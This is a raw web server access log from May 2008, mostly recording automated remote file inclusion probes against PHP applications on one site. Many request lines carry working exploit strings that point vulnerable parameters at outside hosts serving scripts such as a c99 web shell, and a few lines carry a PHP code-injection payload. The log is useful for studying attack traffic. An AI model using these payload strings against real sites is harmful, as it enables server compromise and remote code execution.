201.8.28.186 - - [18/May/2008:17:36:53 -0700] "GET /logs/access_071112.loghttp://blacklight.gotdns.org/c99.txt HTTP/1.1" 404 275 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.summitcircle.com"
201.8.28.186 - - [18/May/2008:17:36:55 -0700] "GET /logs/access_070827.loghttp://blacklight.gotdns.org/c99.txt HTTP/1.1" 404 275 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.summitcircle.com"
82.146.59.231 - - [18/May/2008:17:37:25 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
213.180.84.184 - - [18/May/2008:17:37:54 -0700] "GET /logs/access.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://ctalp.ro/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
213.180.84.184 - - [18/May/2008:17:37:54 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://ctalp.ro/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
213.180.84.184 - - [18/May/2008:17:37:54 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://ctalp.ro/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
74.55.112.34 - - [18/May/2008:17:39:42 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
74.55.112.34 - - [18/May/2008:17:39:42 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
204.10.69.106 - - [18/May/2008:17:39:50 -0700] "GET /logs//include.php?path[docroot]=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
204.10.69.106 - - [18/May/2008:17:39:51 -0700] "GET //include.php?path[docroot]=http://intranet.2circolovimercate.it/intro/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
74.55.112.34 - - [18/May/2008:17:39:58 -0700] "GET /logs/access_070806.log/index.php?action=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
74.55.112.34 - - [18/May/2008:17:39:58 -0700] "GET /index.php?action=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
74.55.112.34 - - [18/May/2008:17:39:58 -0700] "GET /logs/index.php?action=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
82.146.59.231 - - [18/May/2008:17:40:16 -0700] "GET /logs/access_071029.log//modules/vwar/admin/admin.php?vwar_root=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
213.180.84.184 - - [18/May/2008:17:40:28 -0700] "GET /logs/access_071112.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://ctalp.ro/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
74.55.112.34 - - [18/May/2008:17:41:13 -0700] "GET /logs/access_071126.log/index.php?pag=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
74.55.112.34 - - [18/May/2008:17:41:13 -0700] "GET /index.php?pag=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
74.55.112.34 - - [18/May/2008:17:41:13 -0700] "GET /logs/index.php?pag=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
213.180.84.184 - - [18/May/2008:17:42:56 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://ctalp.ro/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
74.55.112.34 - - [18/May/2008:17:45:53 -0700] "GET /logs/access_071021.log/index.php?action=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
74.55.112.34 - - [18/May/2008:17:47:49 -0700] "GET /logs/access.log/index.php?link=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
74.55.112.34 - - [18/May/2008:17:47:49 -0700] "GET /index.php?link=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
74.55.112.34 - - [18/May/2008:17:47:49 -0700] "GET /logs/index.php?link=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
72.21.34.26 - - [18/May/2008:17:49:00 -0700] "GET /wsnlinks/comments.php?id=122 HTTP/1.1" 404 275 "-" "-" "www.summitcircle.com"
193.47.80.137 - - [18/May/2008:17:50:10 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Exabot-Images/3.0; +http://www.exabot.com/go/robot)" "www.summitcircle.com"
193.47.80.137 - - [18/May/2008:17:50:10 -0700] "GET /wsnlinks/templates/default/images/newimages/newstuff.gif HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Exabot-Images/3.0; +http://www.exabot.com/go/robot)" "www.summitcircle.com"
193.47.80.137 - - [18/May/2008:17:50:13 -0700] "GET /wsnlinks/templates/default/images/newimages/newstuff.gif HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Exabot-Images/3.0; +http://www.exabot.com/go/robot)" "www.summitcircle.com"
71.96.92.82 - - [18/May/2008:17:51:28 -0700] "GET /logs/access_070826.loghttp://ironmanshome.chat.ru/images? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8a5) Gecko/20041122" "www.summitcircle.com"
71.96.92.82 - - [18/May/2008:17:52:14 -0700] "GET /logs/access_070820.loghttp://ironmanshome.chat.ru/images? HTTP/1.0" 404 275 "-" "Googlebot/2.0 (http://www.googlebot.com/bot.html)" "www.summitcircle.com"
201.8.28.186 - - [18/May/2008:17:54:42 -0700] "GET /logs/access_070917.loghttp://blacklight.gotdns.org/c99.txt HTTP/1.1" 404 275 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.summitcircle.com"
201.8.28.186 - - [18/May/2008:17:54:47 -0700] "GET /logs/access_071112.loghttp://blacklight.gotdns.org/c99.txt HTTP/1.1" 404 275 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.summitcircle.com"
201.8.28.186 - - [18/May/2008:17:55:01 -0700] "GET /logs/access_070917.loghttp://blacklight.gotdns.org/c99.txt HTTP/1.1" 404 275 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.summitcircle.com"
201.8.28.186 - - [18/May/2008:17:55:07 -0700] "GET /logs/access_071112.loghttp://blacklight.gotdns.org/c99.txt HTTP/1.1" 404 275 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.summitcircle.com"
219.119.139.78 - - [18/May/2008:17:56:08 -0700] "GET //update2.php?lang=http://www.blasterwb.com/publicidad/windowfilm/fotos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
212.108.197.58 - - [18/May/2008:17:56:10 -0700] "GET /logs/access_071217.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://methamphetamine.name/testar.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
212.108.197.58 - - [18/May/2008:17:56:10 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://methamphetamine.name/testar.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
212.108.197.58 - - [18/May/2008:17:56:10 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://methamphetamine.name/testar.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
212.108.197.58 - - [18/May/2008:17:56:29 -0700] "GET /logs/access_080204.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://methamphetamine.name/testar.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
65.55.208.22 - - [18/May/2008:17:56:52 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.summitcircle.com"
65.55.208.22 - - [18/May/2008:17:56:53 -0700] "GET /?D=A HTTP/1.1" 200 779 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.summitcircle.com"
78.108.155.178 - - [18/May/2008:17:57:28 -0700] "GET //update2.php?lang=http://www.blasterwb.com/publicidad/windowfilm/fotos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
75.125.151.18 - - [18/May/2008:17:57:39 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.nextenergy.pt/md.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
75.125.151.18 - - [18/May/2008:17:57:40 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.nextenergy.pt/md.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
75.125.151.18 - - [18/May/2008:17:57:40 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.nextenergy.pt/md.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
219.119.139.78 - - [18/May/2008:17:57:41 -0700] "GET /logs/access_080303.log//update2.php?lang=http://www.blasterwb.com/publicidad/windowfilm/fotos/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
219.119.139.78 - - [18/May/2008:17:57:41 -0700] "GET //update2.php?lang=http://www.blasterwb.com/publicidad/windowfilm/fotos/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
219.119.139.78 - - [18/May/2008:17:58:13 -0700] "GET /logs/access_080303.log//update2.php?lang=http://www.blasterwb.com/publicidad/windowfilm/fotos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
219.119.139.78 - - [18/May/2008:17:58:13 -0700] "GET //update2.php?lang=http://www.blasterwb.com/publicidad/windowfilm/fotos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
219.119.139.78 - - [18/May/2008:17:58:14 -0700] "GET /logs//update2.php?lang=http://www.blasterwb.com/publicidad/windowfilm/fotos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
78.108.155.178 - - [18/May/2008:17:58:40 -0700] "GET /logs/access_080303.log//update2.php?lang=http://www.blasterwb.com/publicidad/windowfilm/fotos/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
78.108.155.178 - - [18/May/2008:17:58:41 -0700] "GET //update2.php?lang=http://www.blasterwb.com/publicidad/windowfilm/fotos/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
75.125.151.18 - - [18/May/2008:17:58:49 -0700] "GET /logs/access_080120.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.nextenergy.pt/md.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
219.119.139.78 - - [18/May/2008:17:59:00 -0700] "GET /logs/access_080323.log//update2.php?lang=http://www.blasterwb.com/publicidad/windowfilm/fotos/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
78.108.155.178 - - [18/May/2008:17:59:20 -0700] "GET /logs/access_080303.log//update2.php?lang=http://www.blasterwb.com/publicidad/windowfilm/fotos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
78.108.155.178 - - [18/May/2008:17:59:20 -0700] "GET //update2.php?lang=http://www.blasterwb.com/publicidad/windowfilm/fotos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
78.108.155.178 - - [18/May/2008:17:59:20 -0700] "GET /logs//update2.php?lang=http://www.blasterwb.com/publicidad/windowfilm/fotos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
219.119.139.78 - - [18/May/2008:17:59:37 -0700] "GET /logs/access_080323.log//update2.php?lang=http://www.blasterwb.com/publicidad/windowfilm/fotos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.summitcircle.com"
78.108.155.178 - - [18/May/2008:18:00:26 -0700] "GET /logs/access_080323.log//update2.php?lang=http://www.blasterwb.com/publicidad/windowfilm/fotos/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.summitcircle.com"
78.108.155.178 - - [18/May/2008:18:00:39 -0700] "GET /logs/access_080323.log//update2.php?lang=http://www.blasterwb.com/publicidad/windowfilm/fotos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
85.18.11.77 - - [18/May/2008:18:01:50 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.forte-industries.com/news/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "summitcircle.com"
85.18.11.77 - - [18/May/2008:18:04:17 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.forte-industries.com/news/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "summitcircle.com"
200.1.202.61 - - [18/May/2008:18:06:09 -0700] "GET /index.php?subpage=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
85.18.11.77 - - [18/May/2008:18:07:14 -0700] "GET /logs/access_070827.log//account.php?action=http://www.forte-industries.com/news/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
74.94.170.50 - - [18/May/2008:18:07:18 -0700] "GET /logs/access_070813.log/index.php?p=http://www.anje.pt/www??????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
74.94.170.50 - - [18/May/2008:18:07:18 -0700] "GET /index.php?p=http://www.anje.pt/www??????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
74.94.170.50 - - [18/May/2008:18:07:19 -0700] "GET /logs/index.php?p=http://www.anje.pt/www??????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.summitcircle.com"
67.19.107.122 - - [18/May/2008:18:08:15 -0700] "GET /logs/access_070813.log/index.php?p=http://www.anje.pt/www??????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
67.19.107.122 - - [18/May/2008:18:08:15 -0700] "GET /index.php?p=http://www.anje.pt/www??????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
67.19.107.122 - - [18/May/2008:18:08:16 -0700] "GET /logs/index.php?p=http://www.anje.pt/www??????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
77.79.246.70 - - [18/May/2008:18:09:11 -0700] "GET /logs/access_071231.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
77.79.246.70 - - [18/May/2008:18:09:12 -0700] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
77.79.246.70 - - [18/May/2008:18:09:12 -0700] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
77.79.246.70 - - [18/May/2008:18:09:13 -0700] "GET /logs/access_071126.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
74.94.170.50 - - [18/May/2008:18:11:29 -0700] "GET /logs/access.log/index.php?p=http://www.anje.pt/www??????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "summitcircle.com"
74.94.170.50 - - [18/May/2008:18:11:29 -0700] "GET /index.php?p=http://www.anje.pt/www??????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "summitcircle.com"
74.94.170.50 - - [18/May/2008:18:11:29 -0700] "GET /logs/index.php?p=http://www.anje.pt/www??????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "summitcircle.com"
67.19.107.122 - - [18/May/2008:18:11:56 -0700] "GET /logs/access.log/index.php?p=http://www.anje.pt/www??????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
67.19.107.122 - - [18/May/2008:18:11:56 -0700] "GET /index.php?p=http://www.anje.pt/www??????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
67.19.107.122 - - [18/May/2008:18:11:56 -0700] "GET /logs/index.php?p=http://www.anje.pt/www??????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
85.214.32.233 - - [18/May/2008:18:12:58 -0700] "GET /logs/access_070924.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
85.214.32.233 - - [18/May/2008:18:12:58 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
85.214.32.233 - - [18/May/2008:18:12:59 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
85.214.32.233 - - [18/May/2008:18:13:14 -0700] "GET /logs/access_070827.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
67.19.11.122 - - [18/May/2008:18:13:37 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
77.79.246.70 - - [18/May/2008:18:13:40 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
77.79.246.70 - - [18/May/2008:18:13:40 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
216.6.180.69 - - [18/May/2008:18:15:16 -0700] "GET /logs/access_071008.log/skin/zero_vote/error.phphttp://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
216.6.180.69 - - [18/May/2008:18:15:16 -0700] "GET /skin/zero_vote/error.phphttp://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
216.6.180.69 - - [18/May/2008:18:15:16 -0700] "GET /logs/skin/zero_vote/error.phphttp://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
216.6.180.69 - - [18/May/2008:18:15:46 -0700] "GET /logs/access_071021.log/skin/zero_vote/error.phphttp://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
202.71.102.187 - - [18/May/2008:18:16:14 -0700] "GET /index.php?site=http://ieras.ru/tmp/aid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
216.6.180.69 - - [18/May/2008:18:18:32 -0700] "GET /logs/access_071008.log/skin/zero_vote/error.php?dir=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
216.6.180.69 - - [18/May/2008:18:18:32 -0700] "GET /skin/zero_vote/error.php?dir=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
216.6.180.69 - - [18/May/2008:18:18:32 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
216.6.180.69 - - [18/May/2008:18:18:56 -0700] "GET /logs/access_071021.log/skin/zero_vote/error.php?dir=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
77.79.246.70 - - [18/May/2008:18:22:44 -0700] "GET /logs/access_070827.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
77.79.246.70 - - [18/May/2008:18:22:45 -0700] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
77.79.246.70 - - [18/May/2008:18:22:45 -0700] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
77.79.246.70 - - [18/May/2008:18:23:54 -0700] "GET /logs/access_070820.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
67.19.105.42 - - [18/May/2008:18:24:59 -0700] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/masprast/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
67.19.105.42 - - [18/May/2008:18:25:00 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/masprast/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
67.19.105.42 - - [18/May/2008:18:25:00 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/masprast/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
85.31.205.148 - - [18/May/2008:18:25:39 -0700] "GET /index.php?sourcedir=http://sos.org.uk/cbcbcb/.a/sex.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.summitcircle.com"
85.31.205.148 - - [18/May/2008:18:25:40 -0700] "GET /index.php?sourcedir=http://sos.org.uk/cbcbcb/.a/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.summitcircle.com"
85.31.205.148 - - [18/May/2008:18:25:44 -0700] "GET /logs/index.php?sourcedir=http://sos.org.uk/cbcbcb/.a/sex.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.summitcircle.com"
85.31.205.148 - - [18/May/2008:18:25:44 -0700] "GET /logs/index.php?sourcedir=http://sos.org.uk/cbcbcb/.a/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.summitcircle.com"
24.215.151.181 - - [18/May/2008:18:25:54 -0700] "GET /logs/access_071021.log HTTP/1.1" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727)" "www.summitcircle.com"
24.215.151.181 - - [18/May/2008:18:26:14 -0700] "GET /logs/access_071021.log HTTP/1.1" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727)" "www.summitcircle.com"
67.19.105.42 - - [18/May/2008:18:26:17 -0700] "GET /logs/access_070730.log//skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/masprast/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
67.19.105.42 - - [18/May/2008:18:26:17 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/masprast/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
67.19.105.42 - - [18/May/2008:18:26:17 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/masprast/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
24.215.151.181 - - [18/May/2008:18:26:49 -0700] "GET /logs/access_071021.log HTTP/1.1" 200 2293760 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727)" "www.summitcircle.com"
24.215.151.181 - - [18/May/2008:18:27:06 -0700] "GET /logs/access_071021.log HTTP/1.1" 200 1179648 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727)" "www.summitcircle.com"
